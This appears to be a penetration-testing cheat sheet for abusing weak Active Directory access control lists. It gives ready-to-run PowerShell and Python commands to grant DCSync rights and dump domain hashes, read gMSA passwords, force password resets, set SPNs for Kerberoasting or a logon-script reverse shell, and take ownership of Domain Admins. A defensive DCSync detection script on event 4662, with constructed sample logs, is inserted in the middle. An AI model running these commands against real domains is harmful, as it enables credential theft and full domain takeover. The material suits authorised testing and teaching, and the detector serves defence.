Abuse Weak Access Control Lists (ACLs)

Write DACL

$CompromisedUserName = 'CompromisedUserName'
$SecPassword = ConvertTo-SecureString 'CompromisedUserPass' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential $CompromisedUserName,$SecPassword
Add-ObjectACL -PrincipalIdentity $CompromisedUserName -Credential $Cred -Rights DCSync

From the attacking box

secretsdump.py $domain/user@$ip

GetChangesAll (DCSync)

From the attacking box

secretsdump.py domain/user@ip

Or use Mimikatz
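A defender-side check for the replication abuse covered in the two sections above, added here as an example and not part of the original page: it flags Windows Security event 4662 records in which an account other than an expected replicator (domain controllers, an AD Connect service account) exercises one of the DS-Replication-Get-Changes control-access rights on the directory. It assumes 4662 auditing is enabled on the domain controllers and that records arrive as dicts keyed by the 4662 field names; the sample records are constructed.

```python
import re

# Control-access rights a DCSync caller needs on the domain naming context.
DCSYNC_GUIDS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes",
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes-All",
    "89e95b76-444d-4c62-991a-0facbeda640c": "DS-Replication-Get-Changes-In-Filtered-Set",
}
CONTROL_ACCESS = 0x100  # AccessMask bit set when an extended right is exercised
GUID_RE = re.compile(r"[0-9a-fA-F]{8}(?:-[0-9a-fA-F]{4}){3}-[0-9a-fA-F]{12}")

def dcsync_rights_used(event, expected_accounts):
    """Return the DCSync-related rights named in a 4662 record, or [] if the
    record is not a replication request or comes from an expected account
    (domain controllers, an AD Connect service account, and so on)."""
    if str(event.get("EventID")) != "4662" or event.get("ObjectServer") != "DS":
        return []
    try:
        mask = int(str(event.get("AccessMask", "0")), 16)
    except ValueError:
        return []
    if not mask & CONTROL_ACCESS:
        return []
    used = {g.lower() for g in GUID_RE.findall(event.get("Properties", ""))}
    hits = [name for guid, name in DCSYNC_GUIDS.items() if guid in used]
    subject = event.get("SubjectUserName", "").upper()
    if subject in {a.upper() for a in expected_accounts}:
        return []
    return hits

def find_dcsync(events, expected_accounts):
    """(SubjectUserName, [rights]) for every record that looks like DCSync."""
    return [(ev.get("SubjectUserName"), hits) for ev in events
            if (hits := dcsync_rights_used(ev, expected_accounts))]

# Constructed sample records (not real log data); field names follow 4662's schema.
SAMPLE_EVENTS = [
    {"EventID": 4662, "SubjectUserName": "DC01$", "ObjectServer": "DS", "AccessMask": "0x100",
     "Properties": "Control Access {1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"},
    {"EventID": 4662, "SubjectUserName": "jdoe", "ObjectServer": "DS", "AccessMask": "0x100",
     "Properties": "Control Access {19195a5b-6da0-11d0-afd3-00c04fd930c9} {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"},
    {"EventID": 4662, "SubjectUserName": "jdoe", "ObjectServer": "DS", "AccessMask": "0x10",
     "Properties": "Write Property {bf967a86-0de6-11d0-a285-00aa003049e2}"},
]

if __name__ == "__main__":
    for who, rights in find_dcsync(SAMPLE_EVENTS, {"DC01$"}):
        print(f"possible DCSync by {who}: {', '.join(rights)}")
```

Pair this with an alert on event 5136 showing a change to nTSecurityDescriptor on the domain object, since a new DCSync grant like the one in the Write DACL section lands in the DACL before the first replication request.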

ReadGMSApassword

Remotely

You may need to run ntpdate $domain first if you get a clock skew error.

python2 /opt/gMSADumper/gMSADumper.py -d $domain -u CompromisedUser -p Password

Locally

.\GMSAPasswordReader.exe --AccountName 'ReadGMSApassword_Rights_To_User'

ForceChangePassword

$CompromisedUserName = 'CompromisedUserName'
$CompromisedUserPass = ConvertTo-SecureString 'CompromisedUserPass' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential $CompromisedUserName,$CompromisedUserPass
$LateralEscUserPass = ConvertTo-SecureString 'LateralEscUserPass' -AsPlainText -Force
Set-DomainUserPassword -Identity LateralEscUserName -AccountPassword $LateralEscUserPass -Credential $Cred

GenericAll

$CompromisedUserName = 'CompromisedUserName'
$CompromisedUserPass = ConvertTo-SecureString 'CompromisedUserPass' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential $CompromisedUserName,$CompromisedUserPass
Invoke-Command -computername 127.0.0.1 -ScriptBlock {Set-ADAccountPassword -Identity LateralEscUserName -reset -NewPassword (ConvertTo-SecureString -AsPlainText 'password' -force)} -Credential $cred

GenericWrite

Use this to set scriptpath (logon script) for a reverse shell, for enumeration, or to set serviceprincipalname so the account can be Kerberoasted.

$CompromisedUserName = 'CompromisedUserName'
$CompromisedUserPass = ConvertTo-SecureString 'CompromisedUserPass' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential $CompromisedUserName,$CompromisedUserPass
Set-DomainObject -Credential $Cred -Identity LateralEscUserName -SET @{serviceprincipalname='thescriptkid/thescriptkid'}
Get-DomainSPNTicket -Credential $Cred LateralEscUserName | fl

OR

Set-DomainObject -Credential $Cred -Identity LateralEscUserName -Set @{scriptpath='C:\path\to\script.ps1'}

WriteOwner

$CompromisedUserName = 'CompromisedUserName'
$CompromisedUserPass = ConvertTo-SecureString 'CompromisedUserPass' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential $CompromisedUserName,$CompromisedUserPass
Set-DomainObjectOwner -Credential $Cred -Identity "Domain Admins" -OwnerIdentity CompromisedUser
Add-DomainObjectAcl -Credential $Cred -TargetIdentity "Domain Admins" -PrincipalIdentity CompromisedUser -Rights All
Add-DomainGroupMember -Identity 'Domain Admins' -Members 'CompromisedUser' -Credential $Cred

Automation

Find ACLs of interest, whether for the currently compromised user or for other users found during enumeration. Start with the current user.

Find-InterestingDomainAcl -ResolveGUIDs | where-object {$_.identityreferencename -like "*CompromisedUser*"}
Find-InterestingDomainAcl -ResolveGUIDs | where-object {$_.ActiveDirectoryRights -like "*GenericAll*"} | Where-Object {$_.identityreferenceclass -ne "computer"}
